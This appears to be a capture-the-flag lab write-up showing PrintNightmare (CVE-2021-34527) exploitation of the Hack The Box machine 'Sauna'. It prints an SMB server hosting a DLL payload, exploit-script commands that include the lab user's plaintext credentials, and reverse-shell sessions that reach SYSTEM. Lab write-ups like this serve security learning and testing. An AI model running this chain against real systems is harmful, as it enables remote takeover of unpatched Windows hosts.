CVE-2021-34527

CVE-2021-34527 is the remote variant of CVE-2021-1675, which uses MS-RPRN and MS-PAR via MSRPC to exploit

It works by exploiting a logic flaw in the MS-RPRN protocol’s RpcAddPrinterDriverEx function.

There’s been another method through the MS-PAR protocol’s the RpcAsyncAddPrinterDriver function. This is similar to RpcAddPrinterDriverEx, but, has far less constraints and is not limited to domain controllers or Windows 10 systems with non-default settings.

┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ impacket-rpcdump $IP | grep -iE 'MS-RPRN|MS-PAR'
protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
protocol: [MS-RPRN]: Print System Remote Protocol

I ran a quick test to see if they are available, and they are indeed available and present on the target system This is much expected as there is a printer service running

exploit

The exploit is available online

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2021-34527]
└─$ simplesmb . -smb2support 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Config file parsed
[*] callback added for uuid 4b324fc8-1670-01d3-1278-5a47bf6ee188 v:3.0
[*] callback added for uuid 6bffd098-a112-3610-9833-46c3f87e345a v:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

The exploit requires to run a SMB server from the attacker machine to host the DLL payload

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2021-34527]
└─$ python3 cve-2021-34527.py egotistical-bank.local/fsmith:Thestrokes23@sauna.egotistical-bank.local '\\10.10.14.4\smb\printnightmare.dll'
[*] connecting to ncacn_np:sauna.egotistical-bank.local[\PIPE\spoolss]
[+] Bind OK
[+] pdriverpath found c:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_9543832f82bb474f\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.4\smb\printnightmare.dll
[*] Try 1...
[*] stage0: 0
[*] Try 2...
 
[...REACTED]

Since I have the credential of the fsmith user, I can just execute the exploit without even having to gain a foothold

The target system connected to the Kali SMB server to fetch the DLL payload

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2021-34527]
└─$ nnc 1234 
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.175] 50663
Windows PowerShell running as user SAUNA$ on SAUNA
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\Windows\system32> whoami
nt authority\system
ps c:\Windows\system32> hostname
SAUNA
ps c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::17a
   ipv6 address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
   link-local ipv6 address . . . . . : fe80::64df:5bff:4879:1d8b%7
   ipv4 address. . . . . . . . . . . : 10.10.10.175
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
                                       10.10.10.2

System Level Compromise

other tool

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2021-34527_v2]
└─$ python3 CVE-2021-34527_v2.py $IP -u fsmith -p Thestrokes23 -d EGOTISTICAL-BANK.LOCAL -proto MS-RPRN -dll printnightmare.dll --local-ip 10.10.14.4 -share smb
[*] starting PrintNightmare PoC
[+] Self-hosted payload at \\10.10.14.4\smb\printnightmare.dll
 
[*] Attempting target: 10.10.10.175
[*] Connecting to ncacn_np:10.10.10.175[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_9543832f82bb474f\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.4\smb\printnightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[-] Exploit returned: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
[*] Closing SMB Server

There is this tool that has a built-in SMB server to host the DLL payload, which makes it handier

┌──(kali㉿kali)-[~/…/htb/labs/sauna/CVE-2021-34527_v2]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.175] 50642
Windows PowerShell running as user SAUNA$ on SAUNA
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> hostname
SAUNA
PS C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::17a
   IPv6 Address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
   Link-local IPv6 Address . . . . . : fe80::64df:5bff:4879:1d8b%7
   IPv4 Address. . . . . . . . . . . : 10.10.10.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
                                       10.10.10.2

System Level Compromise

InfoSec LAB

Explorer

Sauna_Privilege_Escalation_4

CVE-2021-34527

exploit

Exploitation

other tool

Interactive Graph View

Table of Contents

Backlinks